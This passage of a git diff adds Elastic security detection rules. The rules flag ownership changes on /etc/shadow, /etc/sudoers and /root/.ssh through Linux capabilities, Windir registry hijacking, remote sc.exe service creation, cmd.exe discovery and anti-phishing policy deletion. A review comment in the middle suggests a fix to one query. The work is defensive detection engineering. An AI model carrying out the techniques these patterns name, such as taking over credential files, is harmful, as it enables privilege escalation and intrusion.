@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where a processes (granted CAP_CHOWN and/or CAP_FOWNER capabilities) is executed, after which the ownership of a suspicious file or binary is changed. In Linux, the CAP_CHOWN capability allows a process to change the owner of a file, while CAP_FOWNER permits it to bypass permission checks on operations that require file ownership (like reading, writing, and executing). Attackers may abuse these capabilities to obtain unauthorized access to files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via CAP_CHOWN/CAP_FOWNER Capabilities", + "query": "sequence by host.id, process.pid with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and\n process.name != null and process.thread.capabilities.effective : (\"CAP_CHOWN\", \"CAP_FOWNER\") and\n process.command_line : (\"*sudoers*\", \"*passwd*\", \"*shadow*\", \"*/root/*\") and user.id != \"0\"]\n [file where host.os.type == \"linux\" and event.action == \"changed-file-ownership-of\" and event.type == \"change\" and\n event.outcome == \"success\" and file.path in (\n \"/etc/passwd\",\n \"/etc/shadow\",\n \"/etc/sudoers\",\n \"/root/.ssh/*\"\n ) and user.id != \"0\"\n ]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d55abdfb-5384-402b-add4-6c401501b0c3", + "setup": "\nThis rule requires data coming in from Auditd Manager.\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they 
occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /etc/ -p rwxa -k audit_recursive_etc\"\n -- \"-w /root/ -p rwxa -k audit_root\"\n\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "d55abdfb-5384-402b-add4-6c401501b0c3_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d55abdfb-5384-402b-add4-6c401501b0c3_3.json b/packages/security_detection_engine/kibana/security_rule/d55abdfb-5384-402b-add4-6c401501b0c3_3.json new file mode 100644 index 00000000000..23759497708 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d55abdfb-5384-402b-add4-6c401501b0c3_3.json 
@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where a processes (granted CAP_CHOWN and/or CAP_FOWNER capabilities) is executed, after which the ownership of a suspicious file or binary is changed. In Linux, the CAP_CHOWN capability allows a process to change the owner of a file, while CAP_FOWNER permits it to bypass permission checks on operations that require file ownership (like reading, writing, and executing). Attackers may abuse these capabilities to obtain unauthorized access to files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via CAP_CHOWN/CAP_FOWNER Capabilities", + "query": "sequence by host.id, process.pid with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name != null and process.thread.capabilities.effective : (\"CAP_CHOWN\", \"CAP_FOWNER\") and\n process.command_line : (\"*sudoers*\", \"*passwd*\", \"*shadow*\", \"*/root/*\") and user.id != \"0\"]\n [file where host.os.type == \"linux\" and event.action == \"changed-file-ownership-of\" and event.type == \"change\" and\n event.outcome == \"success\" and file.path in (\n \"/etc/passwd\",\n \"/etc/shadow\",\n \"/etc/sudoers\",\n \"/root/.ssh/*\"\n ) and user.id != \"0\"\n ]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d55abdfb-5384-402b-add4-6c401501b0c3", + "setup": "## Setup\n\n\nThis rule requires data coming in from Auditd Manager.\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives 
events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /etc/ -p rwxa -k audit_recursive_etc\"\n -- \"-w /root/ -p rwxa -k audit_root\"\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 3 + }, + "id": "d55abdfb-5384-402b-add4-6c401501b0c3_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_105.json b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_105.json new file mode 100644 index 00000000000..f6bb876b179 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_105.json 
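Review bot: In the second sequence stage, `file.path in (..., "/root/.ssh/*")` relies on `in`, which in EQL is an exact, case-sensitive membership test with no wildcard expansion, so the `/root/.ssh/*` entry only matches a file literally named `*` and an ownership change on `/root/.ssh/authorized_keys` is missed. Linux paths are case-sensitive, so the wildcard-aware, case-sensitive operator is the fit: `event.outcome == "success" and file.path like ("/etc/passwd", "/etc/shadow", "/etc/sudoers", "/root/.ssh/*") and user.id != "0"` (or `:` if the minimum supported stack predates `like`, accepting case-insensitivity). The two stages also come from different producers — `event.action == "exec"` with `process.thread.capabilities.effective` from Elastic Defend and `changed-file-ownership-of` from auditd — so the join on `host.id` and `process.pid` presumably depends on both integrations reporting the same `host.id` for the same machine; that prerequisite belongs in the Rule Specific Setup Note next to the audit rules.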
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a privilege escalation attempt via a rogue Windows directory (Windir) environment variable. This is a known primitive that is often combined with other vulnerabilities to elevate privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via Windir Environment Variable", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKEY_USERS\\\\*\\\\Environment\\\\windir\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\systemroot\",\n \"HKU\\\\*\\\\Environment\\\\windir\",\n \"HKU\\\\*\\\\Environment\\\\systemroot\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Environment\\\\windir\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Environment\\\\systemroot\"\n ) and\n not registry.data.strings : (\"C:\\\\windows\", \"%SystemRoot%\")\n", + "references": [ + "https://www.tiraniddo.dev/2017/05/exploiting-environment-variables-in.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d563aaba-2e72-462b-8658-3e5ea22db3a6", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + 
"reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.007", + "name": "Path Interception by PATH Environment Variable", + "reference": "https://attack.mitre.org/techniques/T1574/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 105 + }, + "id": "d563aaba-2e72-462b-8658-3e5ea22db3a6_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_106.json b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_106.json new file mode 100644 index 00000000000..35ac2e95342 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_106.json 
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a privilege escalation attempt via a rogue Windows directory (Windir) environment variable. This is a known primitive that is often combined with other vulnerabilities to elevate privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via Windir Environment Variable", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKEY_USERS\\\\*\\\\Environment\\\\windir\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\systemroot\",\n \"HKU\\\\*\\\\Environment\\\\windir\",\n \"HKU\\\\*\\\\Environment\\\\systemroot\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Environment\\\\windir\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Environment\\\\systemroot\"\n ) and\n not registry.data.strings : (\"C:\\\\windows\", \"%SystemRoot%\")\n", + "references": [ + "https://www.tiraniddo.dev/2017/05/exploiting-environment-variables-in.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d563aaba-2e72-462b-8658-3e5ea22db3a6", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", 
+ "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.007", + "name": "Path Interception by PATH Environment Variable", + "reference": "https://attack.mitre.org/techniques/T1574/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "d563aaba-2e72-462b-8658-3e5ea22db3a6_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_106.json b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_106.json new file mode 100644 index 00000000000..38ee72e7d8d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_106.json 
@@ -0,0 +1,141 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of sc.exe to create, modify, or start services on remote hosts. This could be indicative of adversary lateral movement but will be noisy if commonly done by admins.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Service Command Lateral Movement", + "query": "sequence by process.entity_id with maxspan = 1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"sc.exe\" or process.pe.original_file_name : \"sc.exe\") and\n process.args : \"\\\\\\\\*\" and process.args : (\"binPath=*\", \"binpath=*\") and\n process.args : (\"create\", \"config\", \"failure\", \"start\")]\n [network where host.os.type == \"windows\" and process.name : \"sc.exe\" and destination.ip != \"127.0.0.1\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": 
"TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1569", + "name": "System Services", + "reference": "https://attack.mitre.org/techniques/T1569/", + "subtechnique": [ + { + "id": "T1569.002", + "name": "Service Execution", + "reference": "https://attack.mitre.org/techniques/T1569/002/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_9.json b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_9.json new file mode 100644 index 00000000000..00fffe06a81 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_9.json 
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the execution of discovery commands to enumerate system information, files, and folders using the Windows Command Shell.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.*", + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "System Information Discovery via Windows Command Shell", + "note": "## Triage and analysis\n\n### Investigating System Information Discovery via Windows Command Shell\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule identifies commands to enumerate system information, files, and folders using the Windows Command Shell.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"cmd.exe\" and process.args : \"/c\" and process.args : (\"set\", \"dir\") and\n not process.parent.executable : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\PROGRA~1\\\\*\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for 
versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + }, + { + "id": "T1083", + "name": "File and Directory Discovery", + "reference": "https://attack.mitre.org/techniques/T1083/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 9 + }, + "id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba_9", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_103.json b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_103.json new file mode 100644 index 00000000000..8562fce4d93 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_103.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks.", + "false_positives": [ + "An anti-phishing policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Anti-Phish Policy Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-AntiPhishPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishpolicy?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/set-up-anti-phishing-policies?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: 
Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_105.json b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_105.json new file mode 100644 index 00000000000..f6569fd1f28 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_105.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks.", + "false_positives": [ + "An anti-phishing policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Anti-Phish Policy Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-AntiPhishPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishpolicy?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/set-up-anti-phishing-policies?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: 
Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_206.json b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_206.json new file mode 100644 index 00000000000..399b9bbea54 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_206.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks.", + "false_positives": [ + "An anti-phishing policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Anti-Phish Policy Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-AntiPhishPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishpolicy?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/set-up-anti-phishing-policies?view=o365-worldwide" + ], + "related_integrations": [ + { + 